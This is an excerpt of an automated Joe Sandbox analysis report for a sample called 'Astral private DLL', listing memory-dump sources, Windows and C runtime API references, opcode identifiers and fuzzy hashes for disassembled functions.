                                                                • SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,0017F3A5), ref: 0017F9DA
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: ExceptionFilterUnhandled
                                                                • String ID:
                                                                • API String ID: 3192549508-0
                                                                • Opcode ID: 7fc3c5ff17ec74a713e66f242cd7fb95ccddbb446812de59de9be6b1b1cbfa4f
                                                                • Instruction ID: fd0a0aa4aa5444e3860a1d1efb3b3e33f702e02f2304cac67f91176364ae9d93
                                                                • Opcode Fuzzy Hash: 7fc3c5ff17ec74a713e66f242cd7fb95ccddbb446812de59de9be6b1b1cbfa4f
                                                                • Instruction Fuzzy Hash:
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: HeapProcess
                                                                • String ID:
                                                                • API String ID: 54951025-0
                                                                • Opcode ID: f0f8abaeab411f8f320f2586190c7724739a61f5ddefb585c5b19238abc26600
                                                                • Instruction ID: 7bdc2ae4ec241c33eb47552ca1bc72a6f4fdd2a176c69f80a00849e33e386692
                                                                • Opcode Fuzzy Hash: f0f8abaeab411f8f320f2586190c7724739a61f5ddefb585c5b19238abc26600
                                                                • Instruction Fuzzy Hash: F9A011302022008B83008F30AE08A083AA8AB00280308002BA808C0830EA3088E0AA00
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                                                • Instruction ID: 658fbba52128302f9ff431eaf4d2c4e2170fe05f00b4fe319e8bd642525dba66
                                                                • Opcode Fuzzy Hash: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                                                • Instruction Fuzzy Hash: E062A271604B859FCB29CF28C8906B9BBF1AF95304F18C96DE89E8B346D734E945CB11
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                                                • Instruction ID: a3d70f5d22bc3141d18e2857cf91d689f271f08d8ab74eee12c3ad2a0cd5f85e
                                                                • Opcode Fuzzy Hash: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                                                • Instruction Fuzzy Hash: 4062E6716083858FCB19CF28C8905B9BBF1BF99304F18C96DE99A8B386D730E945CB55
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                                                • Instruction ID: b57f8fee8214cfee0f02bceeae0174d034cd330ad67e0e75974f4750167e8894
                                                                • Opcode Fuzzy Hash: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                                                • Instruction Fuzzy Hash: D3524A72A187018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA19CB86
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f973b2fbd0e26b953fda11dd1dfbf000fd8dbe3d5fea0db04b251caed6e9a64a
                                                                • Instruction ID: 8b4e9e4bd20b8e857b0f6d6a75ae49c4f52d6a515936c2360cf675fde3fc828d
                                                                • Opcode Fuzzy Hash: f973b2fbd0e26b953fda11dd1dfbf000fd8dbe3d5fea0db04b251caed6e9a64a
                                                                • Instruction Fuzzy Hash: 0612B1B16187069FC718CF28C894A79B7F1FF94308F14892EE99AC7781E334A995CB45
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5c34f2d3610205ec9853637fbfaf850d5e9c504f4fb22cad6320a7c6f2a5f9de
                                                                • Instruction ID: b90653c3c921c6256eef7ee214b406fae1d03d1b4c302fa49fc4dcb35eb3d269
                                                                • Opcode Fuzzy Hash: 5c34f2d3610205ec9853637fbfaf850d5e9c504f4fb22cad6320a7c6f2a5f9de
                                                                • Instruction Fuzzy Hash: 8EF18871A083018FC718CE28C89863ABBE5EBDA318F154A2EF4C5D7352D730E9558B96
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: H_prolog
                                                                • String ID:
                                                                • API String ID: 3519838083-0
                                                                • Opcode ID: 4e714cd4b5b27b23ddbc2b8ef5801b18c87eb14f87f56f28e17bfea504979ee0
                                                                • Instruction ID: 21940acf35a3d1b4f140ff8492cf6c4e314d31a54789c58e7a5fde1b55f3bf0f
                                                                • Opcode Fuzzy Hash: 4e714cd4b5b27b23ddbc2b8ef5801b18c87eb14f87f56f28e17bfea504979ee0
                                                                • Instruction Fuzzy Hash: 9AD181B16087458FDB24DF28C84479BBBF1BF99308F08856DF8899B242D774E909CB56
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6a8bfcb82d9a663dcc9eba325889bf43b3e1640bec1d273e639129fafae914f1
                                                                • Instruction ID: b188373a839c841deb2b84418afd88598a647c261904eaf2fcd0e406618ed92a
                                                                • Opcode Fuzzy Hash: 6a8bfcb82d9a663dcc9eba325889bf43b3e1640bec1d273e639129fafae914f1
                                                                • Instruction Fuzzy Hash: 38E134755083948FC384CF69D89086BBFF1AF9A300F49095EF9C497352C235EA59DBA2
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                                • Instruction ID: 81454f06197ed57a55ff51277320f540dcb8ac1ac05c41cccc8349b99dfa85d3
                                                                • Opcode Fuzzy Hash: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                                • Instruction Fuzzy Hash: 4B9167B02043498BDB28EE64EC90BBA77E9EF60300F50892DF59ED7282DB74A555C752
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                • Instruction ID: b59e88a81d2c10548997da603b757c30a216d21ab204ffa876f3189997fa82fd
                                                                • Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                • Instruction Fuzzy Hash: 728148713043468FDB28DE68DCD1BBD77E4AFA1304F10892DF99E8B282DB7489859752
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a3ed4642117850e6236ee123cde4813787c93d01a7a750c61fcf1facd85f40fa
                                                                • Instruction ID: 2f6a336c6267fb7c6920419274c787f69eeb04b9cbd03c86e91a0621a0631810
                                                                • Opcode Fuzzy Hash: a3ed4642117850e6236ee123cde4813787c93d01a7a750c61fcf1facd85f40fa
                                                                • Instruction Fuzzy Hash: 53615735A40F0997DB38BA686895BBE7397FB21380F54051AE842DF282DB51DF428F15
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                                • Instruction ID: d7ef316ee511b783362d187a83121cf5174c1ebbb7298bbe84d4e31a6e274366
                                                                • Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                                • Instruction Fuzzy Hash: 36512420204F465BDF387A2C855ABBE6797DB12704F18091DF982DB282CB05EF059FA1
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 15d05d2df7c0c6d46d699453608de3454dcab0b885417a40fe567557d5492328
                                                                • Instruction ID: a5d0a1e42560c4788ba83035de734d94b04081b0124ee49e8b784c217edc4d64
                                                                • Opcode Fuzzy Hash: 15d05d2df7c0c6d46d699453608de3454dcab0b885417a40fe567557d5492328
                                                                • Instruction Fuzzy Hash: 1D51E1315093D58FC702CF28D94046EBFE1AEAA314F5909ADF8D95B243C321DA5BCB62
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7b3d3bfc9449bfd6af5ce6026510130f8c9150b45e4bfac61e1cc03e4399542e
                                                                • Instruction ID: 79aa03783abebd92a2abcc163bc9aa5b7cc6ea4b3e2806b8d4dbae55267c3336
                                                                • Opcode Fuzzy Hash: 7b3d3bfc9449bfd6af5ce6026510130f8c9150b45e4bfac61e1cc03e4399542e
                                                                • Instruction Fuzzy Hash: 1B51DFB1A087119FC748CF19D88055AF7E1FF88314F058A2EE899E3340D734EA59CB96
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                • Instruction ID: a17ab51427032a1d53111d3b287a1d07639c0b54ba208d611267007cbca62421
                                                                • Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                • Instruction Fuzzy Hash: 6831E7B1A147568FCB18DF28C85116EBBE0FB95304F50852DE4D9D7341CB35EA1ACB92
                                                                APIs
                                                                • _swprintf.LIBCMT ref: 0016E30E
                                                                  • Part of subcall function 00164092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001640A5
                                                                  • Part of subcall function 00171DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,001A1030,00000200,0016D928,00000000,?,00000050,001A1030), ref: 00171DC4
                                                                • _strlen.LIBCMT ref: 0016E32F
                                                                • SetDlgItemTextW.USER32(?,0019E274,?), ref: 0016E38F
                                                                • GetWindowRect.USER32(?,?), ref: 0016E3C9
                                                                • GetClientRect.USER32(?,?), ref: 0016E3D5
                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0016E475
                                                                • GetWindowRect.USER32(?,?), ref: 0016E4A2
                                                                • SetWindowTextW.USER32(?,?), ref: 0016E4DB
                                                                • GetSystemMetrics.USER32(00000008), ref: 0016E4E3
                                                                • GetWindow.USER32(?,00000005), ref: 0016E4EE
                                                                • GetWindowRect.USER32(00000000,?), ref: 0016E51B
                                                                • GetWindow.USER32(00000000,00000002), ref: 0016E58D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                                • String ID: $%s:$CAPTION$d
                                                                • API String ID: 2407758923-2512411981
                                                                • Opcode ID: fafd7eeb3a86d6a0c579b1807260bfa21e4df46400e32920a148c12028c16590
                                                                • Instruction ID: 960510ded7cde2ff3f5e5cdc5898e4272c53445d7039ae1d7a0722c860438568
                                                                • Opcode Fuzzy Hash: fafd7eeb3a86d6a0c579b1807260bfa21e4df46400e32920a148c12028c16590
                                                                • Instruction Fuzzy Hash: C3818F72608301AFD710DFA8CD89E6BBBE9EB88704F08491DFA95D7290D731E9058B52
                                                                APIs
                                                                • ___free_lconv_mon.LIBCMT ref: 0018CB66
                                                                  • Part of subcall function 0018C701: _free.LIBCMT ref: 0018C71E
                                                                  • Part of subcall function 0018C701: _free.LIBCMT ref: 0018C730
                                                                  • Part of subcall function 0018C701: _free.LIBCMT ref: 0018C742
                                                                  • Part of subcall function 0018C701: _free.LIBCMT ref: 0018C754
                                                                  • Part of subcall function 0018C701: _free.LIBCMT ref: 0018C766
                                                                  • Part of subcall function 0018C701: _free.LIBCMT ref: 0018C778
                                                                  • Part of subcall function 0018C701: _free.LIBCMT ref: 0018C78A
                                                                  • Part of subcall function 0018C701: _free.LIBCMT ref: 0018C79C
                                                                  • Part of subcall function 0018C701: _free.LIBCMT ref: 0018C7AE
                                                                  • Part of subcall function 0018C701: _free.LIBCMT ref: 0018C7C0
                                                                  • Part of subcall function 0018C701: _free.LIBCMT ref: 0018C7D2
                                                                  • Part of subcall function 0018C701: _free.LIBCMT ref: 0018C7E4
                                                                  • Part of subcall function 0018C701: _free.LIBCMT ref: 0018C7F6
                                                                • _free.LIBCMT ref: 0018CB5B
                                                                  • Part of subcall function 00188DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0018C896,?,00000000,?,00000000,?,0018C8BD,?,00000007,?,?,0018CCBA,?), ref: 00188DE2
                                                                  • Part of subcall function 00188DCC: GetLastError.KERNEL32(?,?,0018C896,?,00000000,?,00000000,?,0018C8BD,?,00000007,?,?,0018CCBA,?,?), ref: 00188DF4
                                                                • _free.LIBCMT ref: 0018CB7D
                                                                • _free.LIBCMT ref: 0018CB92
                                                                • _free.LIBCMT ref: 0018CB9D
                                                                • _free.LIBCMT ref: 0018CBBF
                                                                • _free.LIBCMT ref: 0018CBD2
                                                                • _free.LIBCMT ref: 0018CBE0
                                                                • _free.LIBCMT ref: 0018CBEB
                                                                • _free.LIBCMT ref: 0018CC23
                                                                • _free.LIBCMT ref: 0018CC2A
                                                                • _free.LIBCMT ref: 0018CC47
                                                                • _free.LIBCMT ref: 0018CC5F
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
